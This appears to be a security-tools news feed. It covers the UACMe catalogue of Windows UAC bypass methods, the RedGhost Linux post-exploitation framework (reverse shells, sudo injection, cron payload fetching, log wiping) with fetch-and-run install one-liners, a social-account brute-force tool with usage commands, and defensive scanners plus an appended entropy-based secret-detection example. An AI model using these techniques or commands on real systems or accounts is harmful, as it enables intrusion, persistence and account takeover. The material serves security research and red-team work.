  4. Author: Jon Ericson, WinNT/Gootkit, mzH
    • Type: AppCompat
    • Method: RedirectEXE Shim
    • Target(s): \system32\cliconfg.exe
    • Component(s): -
    • Implementation: ucmShimRedirectEXE
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TP (> 9600)
      • How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
  5. Author: WinNT/Simda
    • Type: Elevated COM interface
    • Method: ISecurityEditor
    • Target(s): HKLM registry keys
    • Component(s): -
    • Implementation: ucmSimdaTurnOffUac
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: ISecurityEditor interface method changed
  6. Author: Win32/Carberp
    • Type: Dll Hijack
    • Method: WUSA
    • Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe
    • Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll
    • Implementation: ucmWusaMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: WUSA /extract option removed
  7. Author: Win32/Carberp derivative
    • Type: Dll Hijack
    • Method: WUSA
    • Target(s): \system32\cliconfg.exe
    • Component(s): ntwdblib.dll
    • Implementation: ucmWusaMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: WUSA /extract option removed
  8. Author: Leo Davidson derivative by Win32/Tilon
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): Actionqueue.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: sysprep.exe hardened LoadFrom manifest
  9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative
    • Type: Dll Hijack
    • Method: IFileOperation, ISecurityEditor, WUSA
    • Target(s): IFEO registry keys, \system32\cliconfg.exe
    • Component(s): Attacker defined Application Verifier Dll
    • Implementation: ucmAvrfMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH1 (10147)
      • How: WUSA /extract option removed, ISecurityEditor interface method changed
  10. Author: WinNT/Pitou, Win32/Carberp derivative
    • Type: Dll Hijack
    • Method: IFileOperation, WUSA
    • Target(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exe
    • Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll
    • Implementation: ucmWinSATMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH2 (10548)
      • How: AppInfo elevated application path control hardening
  11. Author: Jon Ericson, WinNT/Gootkit, mzH
    • Type: AppCompat
    • Method: Shim Memory Patch
    • Target(s): \system32\iscsicli.exe
    • Component(s): Attacker prepared shellcode
    • Implementation: ucmShimPatch
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions
  12. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): dbgcore.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: Windows 10 TH2 (10565)
      • How: sysprep.exe manifest updated
  13. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\mmc.exe EventVwr.msc
    • Component(s): elsext.dll
    • Implementation: ucmMMCMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14316)
      • How: Missing dependency removed
  14. Author: Leo Davidson, WinNT/Sirefef derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system\credwiz.exe, \system32\wbem\oobe.exe
    • Component(s): netutils.dll
    • Implementation: ucmSirefefMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 TH2 (10548)
      • How: AppInfo elevated application path control hardening
  15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\cliconfg.exe
    • Component(s): ntwdblib.dll
    • Implementation: ucmGenericAutoelevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14316)
      • How: Cliconfg.exe autoelevation removed
  16. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe
    • Component(s): SLC.dll
    • Implementation: ucmGWX
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14316)
      • How: AppInfo elevated application path control and inetmgr executable hardening
  17. Author: Leo Davidson derivative
    • Type: Dll Hijack (Import forwarding)
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): unbcl.dll
    • Implementation: ucmStandardAutoElevation2
    • Works from: Windows 8.1 (9600)
    • Fixed in: Windows 10 RS1 (14371)
      • How: sysprep.exe manifest updated
  18. Author: Leo Davidson derivative
    • Type: Dll Hijack (Manifest)
    • Method: IFileOperation
    • Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)
    • Component(s): Attacker defined
    • Implementation: ucmAutoElevateManifest
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14371)
      • How: Manifest parsing logic reviewed
  19. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\inetsrv\inetmgr.exe
    • Component(s): MsCoree.dll
    • Implementation: ucmInetMgrMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14376)
      • How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
  20. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\mmc.exe, Rsop.msc
    • Component(s): WbemComn.dll
    • Implementation: ucmMMCMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16232)
      • How: Target requires wbemcomn.dll to be signed by MS
  21. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation, SxS DotLocal
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): comctl32.dll
    • Implementation: ucmSXSMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16232)
      • How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
  22. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation, SxS DotLocal
    • Target(s): \system32\consent.exe
    • Component(s): comctl32.dll
    • Implementation: ucmSXSMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  23. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\pkgmgr.exe
    • Component(s): DismCore.dll
    • Implementation: ucmDismMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  24. Author: BreakingMalware
    • Type: Shell API
    • Method: Environment variables expansion
    • Target(s): \system32\CompMgmtLauncher.exe
    • Component(s): Attacker defined
    • Implementation: ucmCometMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS2 (15031)
      • How: CompMgmtLauncher.exe autoelevation removed
  25. Author: Enigma0x3
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
    • Component(s): Attacker defined
    • Implementation: ucmHijackShellCommandMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS2 (15031)
      • How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
  26. Author: Enigma0x3
    • Type: Race Condition
    • Method: File overwrite
    • Target(s): %temp%\GUID\dismhost.exe
    • Component(s): LogProvider.dll
    • Implementation: ucmDiskCleanupRaceCondition
    • Works from: Windows 10 TH1 (10240)
    • AlwaysNotify compatible
    • Fixed in: Windows 10 RS2 (15031)
      • How: File security permissions altered
  27. Author: ExpLife
    • Type: Elevated COM interface
    • Method: IARPUninstallStringLauncher
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmUninstallLauncherMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16199)
      • How: UninstallStringLauncher interface removed from COMAutoApprovalList
  28. Author: Exploit/Sandworm
    • Type: Whitelisted component
    • Method: InfDefaultInstall
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmSandwormMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)
  29. Author: Enigma0x3
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\sdclt.exe
    • Component(s): Attacker defined
    • Implementation: ucmAppPathMethod
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: Windows 10 RS3 (16215)
      • How: Shell API update
  30. Author: Leo Davidson derivative, lhc645
    • Type: Dll Hijack
    • Method: WOW64 logger
    • Target(s): \syswow64\{any elevated exe, e.g wusa.exe}
    • Component(s): wow64log.dll
    • Implementation: ucmWow64LoggerMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  31. Author: Enigma0x3
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\sdclt.exe
    • Component(s): Attacker defined
    • Implementation: ucmSdcltIsolatedCommandMethod
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: Windows 10 RS4 (17025)
      • How: Shell API / Windows components update
  32. Author: xi-tauw
    • Type: Dll Hijack
    • Method: UIPI bypass with uiAccess application
    • Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe
    • Component(s): duser.dll, osksupport.dll
    • Implementation: ucmUiAccessMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  33. Author: winscripting.blog
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
    • Component(s): Attacker defined
    • Implementation: ucmMsSettingsDelegateExecuteMethod
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: unfixed
      • How: -
  34. Author: James Forshaw
    • Type: Shell API
    • Method: Environment variables expansion
    • Target(s): \system32\svchost.exe via \system32\schtasks.exe
    • Component(s): Attacker defined
    • Implementation: ucmDiskCleanupEnvironmentVariable
    • Works from: Windows 8.1 (9600)
    • AlwaysNotify compatible
    • Fixed in: unfixed
      • How: -
  35. Author: CIA & James Forshaw
    • Type: Impersonation
    • Method: Token Manipulations
    • Target(s): Autoelevated applications
    • Component(s): Attacker defined
    • Implementation: ucmTokenModification
    • Works from: Windows 7 (7600)
    • AlwaysNotify compatible, see note
    • Fixed in: Windows 10 RS5 (17686)
      • How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added
  36. Author: Thomas Vanhoutte aka SandboxEscaper
    • Type: Race condition
    • Method: NTFS reparse point & Dll Hijack
    • Target(s): wusa.exe
    • Component(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dll
    • Implementation: ucmJunctionMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  37. Author: Ernesto Fernandez, Thomas Vanhoutte
    • Type: Dll Hijack
    • Method: SxS DotLocal, NTFS reparse point
    • Target(s): \system32\dccw.exe
    • Component(s): GdiPlus.dll
    • Implementation: ucmSXSDccwMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  38. Author: Clement Rouault
    • Type: Whitelisted component
    • Method: APPINFO command line spoofing
    • Target(s): \system32\mmc.exe
    • Component(s): Attacker defined
    • Implementation: ucmHakrilMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  39. Author: Stefan Kanthak
    • Type: Dll Hijack
    • Method: .NET Code Profiler
    • Target(s): \system32\mmc.exe
    • Component(s): Attacker defined
    • Implementation: ucmCorProfilerMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  40. Author: Ruben Boonen
    • Type: COM Handler Hijack
    • Method: Registry key manipulation
    • Target(s): \system32\mmc.exe, \System32\recdisc.exe
    • Component(s): Attacker defined
    • Implementation: ucmCOMHandlersMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 19H1 (18362)
      • How: Side effect of Windows changes
  41. Author: Oddvar Moe
    • Type: Elevated COM interface
    • Method: ICMLuaUtil
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmCMLuaUtilShellExecMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  42. Author: BreakingMalware and Enigma0x3
    • Type: Elevated COM interface
    • Method: IFwCplLua
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmFwCplLuaMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS4 (17134)
      • How: Shell API update
  43. Author: Oddvar Moe derivative
    • Type: Elevated COM interface
    • Method: IColorDataProxy, ICMLuaUtil
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmDccwCOMMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  44. Author: bytecode77
    • Type: Shell API
    • Method: Environment variables expansion
    • Target(s): Multiple auto-elevated processes
    • Component(s): Various per target
    • Implementation: ucmVolatileEnvMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16299)
      • How: Current user system directory variables ignored during process creation
  45. Author: bytecode77
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\slui.exe
    • Component(s): Attacker defined
    • Implementation: ucmSluiHijackMethod
    • Works from: Windows 8.1 (9600)
    • Fixed in: unfixed
      • How: -
  46. Author: Anonymous
    • Type: Race Condition
    • Method: Registry key manipulation
    • Target(s): \system32\BitlockerWizardElev.exe
    • Component(s): Attacker defined
    • Implementation: ucmBitlockerRCMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS4 (>16299)
      • How: Shell API update
  47. Author: clavoillotte & 3gstudent
    • Type: COM Handler Hijack
    • Method: Registry key manipulation
    • Target(s): \system32\mmc.exe
    • Component(s): Attacker defined
    • Implementation: ucmCOMHandlersMethod2
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 19H1 (18362)
      • How: Side effect of Windows changes
  48. Author: deroko
    • Type: Elevated COM interface
    • Method: ISPPLUAObject
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmSPPLUAObjectMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS5 (17763)
      • How: ISPPLUAObject interface method changed
  49. Author: RinN
    • Type: Elevated COM interface
    • Method: ICreateNewLink
    • Target(s): \system32\TpmInit.exe
    • Component(s): WbemComn.dll
    • Implementation: ucmCreateNewLinkMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14393)
      • How: Side effect of consent.exe COMAutoApprovalList introduction
  50. Author: Anonymous
    • Type: Elevated COM interface
    • Method: IDateTimeStateWrite, ISPPLUAObject
    • Target(s): w32time service
    • Component(s): w32time.dll
    • Implementation: ucmDateTimeStateWriterMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS5 (17763)
      • How: Side effect of ISPPLUAObject interface change
  51. Author: bytecode77 derivative
    • Type: Elevated COM interface
    • Method: IAccessibilityCplAdmin
    • Target(s): \system32\rstrui.exe
    • Component(s): Attacker defined
    • Implementation: ucmAcCplAdminMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS4 (17134)
      • How: Shell API update
  52. Author: David Wells
    • Type: Whitelisted component
    • Method: AipNormalizePath parsing abuse
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmDirectoryMockMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  53. Author: Emeric Nasi
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\sdclt.exe
    • Component(s): Attacker defined
    • Implementation: ucmShellDelegateExecuteCommandMethod
    • Works from: Windows 10 (14393)
    • Fixed in: unfixed
      • How: -
  54. Author: egre55
    • Type: Dll Hijack
    • Method: Dll path search abuse
    • Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
    • Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
    • Implementation: ucmEgre55Method
    • Works from: Windows 10 (14393)
    • Fixed in: unfixed
      • How: -
  55. Author: James Forshaw
    • Type: GUI Hack
    • Method: UIPI bypass with token modification
    • Target(s): \system32\osk.exe, \system32\msconfig.exe
    • Component(s): Attacker defined
    • Implementation: ucmTokenModUIAccessMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed
      • How: -
  56. Author: Hashim Jawad
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\WSReset.exe
    • Component(s): Attacker defined
    • Implementation: ucmShellDelegateExecuteCommandMethod
    • Works from: Windows 10 (17134)
    • Fixed in: unfixed
      • How: -
  57. Author: Leo Davidson derivative by Win32/Gapz
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): unattend.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: sysprep.exe hardened LoadFrom manifest elements
Note:
  • Method (6) is unavailable in a wow64 environment starting from Windows 8;
  • Methods (11) and (54) are implemented only in the x86-32 version;
  • Methods (13), (19), (30), (38) and (50) are implemented only in the x64 version;
  • Method (14) requires process injection; wow64 is unsupported, use the x64 version of this tool;
  • Method (26) still works, however its main advantage was a UAC bypass at the AlwaysNotify level, and that is gone since build 15031;
  • Method (30) requires x64 because it abuses a WOW64 subsystem feature;
  • Method (35) is AlwaysNotify compatible, since there will always be running autoelevated apps, or the user will have to launch them anyway;
  • Method (38) requires an internet connection as it executes a remote script located at github.com/hfiref0x/Beacon/blob/master/uac/exec.html;
  • Method (55) is not really reliable (like any GUI hack) and is included just for fun.
Run examples:
  • akagi32.exe 1
  • akagi64.exe 3
  • akagi32 1 c:\windows\system32\calc.exe
  • akagi64 3 c:\windows\system32\charmap.exe

Warning
  • This tool shows ONLY popular UAC bypass methods used by malware, and reimplements some of them in a different way, improving on the original concepts. Other methods exist that are not yet known to the general public; be aware of this;
  • Using method (5) will permanently turn off UAC (after reboot); make sure to do this in a test environment, or don't forget to re-enable UAC after using the tool;
  • Using methods (5) and (9) will permanently compromise the security of the target registry keys (the UAC Settings key for (5) and IFEO for (9)); if you run tests on your real machine, restore the keys' security manually after you are done with the tool;
  • This tool is not intended for AV tests and is not tested to work in an aggressive AV environment; if you still plan to use it with bloatware AV software installed, you use it at your own risk;
  • Some AV may flag this tool as HackTool; MSE/WinDefender constantly marks it as malware, nope;
  • If you run this program on a real computer, remember to remove all program leftovers after usage; for more info about the files it drops into system folders, see the source code;
  • Most methods were created for x64, with no x86-32 support in mind. I don't see any sense in supporting 32-bit versions of Windows or wow64; however, with small tweaks most of them will run under wow64 as well.
If you are wondering why this still exists and works, here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as a bonus): https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105

Windows 10 support and testing policy
  • EOL'ed versions of Windows 10 are not supported and therefore not tested (at the moment of writing, the EOL'ed Windows 10 versions are: TH1 (10240), TH2 (10586));
  • Insider builds are not supported as methods may be fixed there.

Protection
  • Account without administrative privileges.

Malware usage
  • It is currently known that UACMe is used by Adware/Multiplug (9), Win32/Dyre (3), Win32/Empercrypt (10 & 13) and the IcedID downloader (35 & 41). We do not take any responsibility for the use of this tool for malicious purposes. It is free, open-source and provided AS-IS for everyone.

Other usage
  • Currently used as a "signature" by the "THOR APT" scanner (handmade pattern matching fraudware from Germany). We do not take any responsibility for this tool's usage in fraudware;
  • The scamware project called "uacguard" has references to UACMe from their platform. We do not take any responsibility for this tool's usage in scamware. The repository https://github.com/hfiref0x/UACME and its contents are the only genuine source for UACMe code. We have nothing to do with external links to this project, mentions anywhere, or modifications (forks);
  • In July 2016 the so-called "security company" Cymmetria released a report about a script-kiddie malware bundle called "Patchwork" and false-flagged it as an APT. They stated it was using the "UACME method", which in fact is just a slightly and unprofessionally modified injector dll from UACMe v1.9, using the Carberp/Pitou hybrid method in a malware self-implemented way. We do not take any responsibility for UACMe usage in the dubious advertising campaigns of third-party "security companies".

Build
  • UACMe comes with full source code, written in C, with some parts written in C#;
  • To build from source you need Microsoft Visual Studio 2013/2015 U2 or later.

Instructions
  • Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
    • v120 for Visual Studio 2013;
    • v140 for Visual Studio 2015;
    • v141 for Visual Studio 2017.
  • For v140 and above set Target Platform Version (Project->Properties->General):
    • If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
    • If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed).
  • Note that the Fujinami module is built with .NET Framework 3.0 (this is a requirement for it to work), so .NET Framework 3.0 must be installed if you want to build this module.
  • Can be built with SDK 8.1/10.17134/10.17763.

Authors
(c) 2014 - 2019 UACMe Project


RedGhost v2.0 - Linux Post Exploitation Framework Designed To Assist Red Teams In Gaining Persistence, Reconnaissance And Leaving No Trace


Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.
  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
  • SudoInject
Function to inject the "sudo" command with a wrapper function that runs a reverse root shell every time "sudo" is run, for privilege escalation
  • lsInject
Function to inject the "ls" command with a wrapper function that runs the payload every time "ls" is run, for persistence
  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence
  • GetRoot
Function to try various methods to escalate privileges
  • Clearlogs
Function to clear logs and make investigation with forensics difficult
  • MassInfoGrab
Function to grab mass reconnaissance/information on the system
  • BanIp
Function to ban an IP using iptables

Installation
One-liner to install RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh
One-liner to install the prerequisites and RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; ./redghost.sh

Prerequisites
dialog, gcc, iptables


Shellsum - A Defense Tool - Detect Web Shells In Local Directories Via Md5Sum


A defense tool - detect web shells in local directories via md5sum

Features
  • Fast speed
  • Lightweight
  • Big database
  • Tabled output

Usage
  • Install
git clone https://github.com/ManhNho/shellsum.git
chmod 755 -R shellsum/
cd shellsum/
pip install -r requirements.txt
  • Run
python shellsum.py


ToDo
  • Smooth output
  • Export file report
  • Modularization
  • Bigger database


Detect It Easy - Program For Determining Types Of Files For Windows, Linux And MacOS


Detect It Easy, abbreviated "DIE", is a program for determining the types of files.
"DIE" is a cross-platform application: apart from the Windows version, there are also versions for Linux and Mac OS.

Many programs of this kind (PEID, PE tools) allow the use of third-party signatures. Unfortunately, those signatures only scan bytes against a pre-set mask, and it is not possible to specify additional parameters. As a result, false positives are common. More complicated algorithms are usually hard-coded in the program itself, so adding a new complex detect requires recompiling the entire project, and no one except the authors themselves can change the algorithm of a detect. As time passes, such programs lose relevance without constant support.

Detect It Easy has a totally open signature architecture. You can easily add your own detection algorithms or modify existing ones, because signatures are written as scripts. The script language is very similar to JavaScript, and anyone who understands the basics of programming will easily understand how it works. Someone may worry that scripts run very slowly. Indeed, scripts run slower than compiled code, but thanks to the good optimization of the script engine this does not cause any special inconvenience, and the possibilities of the open architecture compensate for this limitation.

DIE exists in three versions: the basic version ("DIE"), the Lite version ("DIEL") and the console version ("DIEC"). All three use the same signatures, which are located in the folder "db". Inside this folder are nested sub-folders ("Binary", "PE" and others) whose names correspond to file types. DIE first determines the type of file, then sequentially loads all the signatures in the corresponding folder. Currently the program recognizes the following types:
  • MSDOS: executable files (MS-DOS)
  • PE: executable files (Windows)
  • ELF: executable files (Linux)
  • MACH: executable files (Mac OS)
  • Text: text files
  • Binary: all other files
Binaries for Windows, Linux and Mac can be downloaded here: http://ntinfo.biz/


Brute_Force - BruteForce Gmail, Hotmail, Twitter, Facebook & Netflix



Install :
pip install proxylist

pip install mechanize

Usage:

BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list

python3 Brute_Force.py -g Account@gmail.com -p Password_Single

BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list

python3 Brute_Force.py -t Account@hotmail.com -p Password_Single

BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt

BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt

BruteForce Netflix Attack
Running a VPN is recommended
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt



Userrecon v1.1.0 - Recognition Usernames In 187 Social Networks


Find usernames in 187 social networks.

Installation
  1. Install dependencies (Debian/Ubuntu):
sudo apt install python3 python3-pip
  2. Install with pip3:
sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git
userrecon-py --help

Building from Source
Clone this repository, and:
git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
sudo -H pip3 install -r requirements.txt
python3 setup.py build
sudo python3 setup.py install

Update
To update this tool to the latest version, run:
sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
userrecon-py --version

Usage
Start by printing the available actions by running userrecon-py --help. Then you can perform the following tests:
userrecon-py --target decoxviii -o test_one
Watch this demo video

Thanks
This program is possible thanks to:

decoxviii
MIT


Kali NetHunter App Store - The New Android Store Dedicated to Free Security Apps


The Kali NetHunter App Store is a one-stop-shop for security relevant Android applications. It is the ultimate alternative to the Google Play store for any Android device, whether rooted or not, NetHunter or stock. If you are after any security application for your Android device, the NetHunter Store will be the place to get it.

The NetHunter store is powered by a slightly modified version of F-Droid, thanks to the hard work of the F-Droid community, in particular Peter Serwylo whose help was invaluable. Whilst F-Droid installs its clients with telemetry disabled and asks for consent before submitting crash reports, we went a step further and removed the entire code – just to make sure that our privacy cannot be compromised by accident. We also widened the inclusion policy to allow proprietary applications into the store.

Parrot Security 4.7 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind


Parrot is a GNU/Linux distribution based on Debian Testing and designed with Security, Development and Privacy in mind.


It includes a full portable laboratory for security and digital forensics experts, but it also includes all you need to develop your own software or protect your privacy while surfing the net.

Documentation

User Guide

Infrastructure Zone

Developer zone

Side projects


Git-Hound - Find Exposed Keys Across GitHub Using Code Search Keywords


A pattern-matching, batch-catching secret snatcher. This project is intended to be used for educational purposes.

Git Hound makes it easy to find exposed API keys on GitHub using pattern matching, targeted querying, and a scoring system.

Usage
echo "tillsongalloway.com" | python git-hound.py
or
python git-hound.py --subdomain-file subdomains.txt
We also offer a number of flags to target specific patterns (known service API keys), file names (.htpasswd, .env), and languages (python, javascript).

Flags
  • --subdomain-file - The file with the subdomains
  • --output - The output file (default is stdout)
  • --output-type - The output type (requires output flag to be set; default is flatfile)
  • --all - Print all URLs, including ones with no pattern match. Otherwise, the scoring system will do the work.
  • --regex-file - Supply a custom regex file
  • --api-keys - Enable generic API key searching. This uses common API key patterns and Shannon entropy to find potential exposed API keys.
  • --language-file - Supply a custom file with languages to search.
  • --config-file - Custom config file (default is config.yml)
  • --pages - Max pages to search (default is 100, the page maximum)
  • --silent - Don't print results to stdout (most reasonably used with --output).
  • --no-antikeywords - Don't attempt to filter out known mass scans
  • --only-filtered - Only search filtered queries (languages, file extensions)
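As an added illustration of the idea behind --api-keys (this is not Git-Hound's own code), the scanner below scores candidate secrets by combining a credential-looking assignment pattern with the Shannon entropy of the value. The regexes, thresholds, placeholder filter and sample lines are all constructed for this example and are not Git-Hound's pattern or anti-keyword lists.

```python
"""Entropy-plus-pattern secret scoring, added here to illustrate the idea behind
Git-Hound's --api-keys flag. Not Git-Hound's code: patterns, thresholds and the
sample input are constructed for this example."""
import math
import re
from collections import Counter

# Assumed pattern: a credential-looking assignment such as api_key = "...".
ASSIGNMENT_RE = re.compile(
    r"""(?i)\b(api[_-]?key|secret[_-]?key|access[_-]?token|password)\b"""
    r"""\s*[:=]\s*['"]?([A-Za-z0-9+/=_\-]{12,})"""
)
# Assumed pattern: any bare base64/hex-looking run long enough to be a key.
TOKEN_RE = re.compile(r"\b[A-Za-z0-9+/=_\-]{20,}\b")

# Assumed thresholds in bits per character: random keys over a hex or base64
# alphabet sit around 4 to 6, English words and identifiers mostly below 3.5.
ENTROPY_THRESHOLD = 3.5
HIGH_ENTROPY = 4.5
# Values that look like secrets but are obvious placeholders (assumed list).
PLACEHOLDER_WORDS = ("example", "changeme", "xxxx", "your_")


def shannon_entropy(s):
    """Shannon entropy of the string's empirical character distribution (bits/char)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def score_line(line):
    """Score every candidate value on one line.

    +2 if the value is the right-hand side of a credential-looking assignment,
    +1 if its entropy reaches ENTROPY_THRESHOLD, +1 more if it reaches HIGH_ENTROPY.
    Placeholder values are dropped; values scoring 0 are not reported.
    """
    candidates = {}
    for m in ASSIGNMENT_RE.finditer(line):
        candidates[m.group(2)] = 2
    for m in TOKEN_RE.finditer(line):
        candidates.setdefault(m.group(0), 0)  # keep the higher assignment score

    findings = []
    for value, score in candidates.items():
        if any(w in value.lower() for w in PLACEHOLDER_WORDS):
            continue
        ent = shannon_entropy(value)
        if ent >= ENTROPY_THRESHOLD:
            score += 1
        if ent >= HIGH_ENTROPY:
            score += 1
        if score > 0:
            findings.append({"value": value, "entropy": round(ent, 2), "score": score})
    return findings


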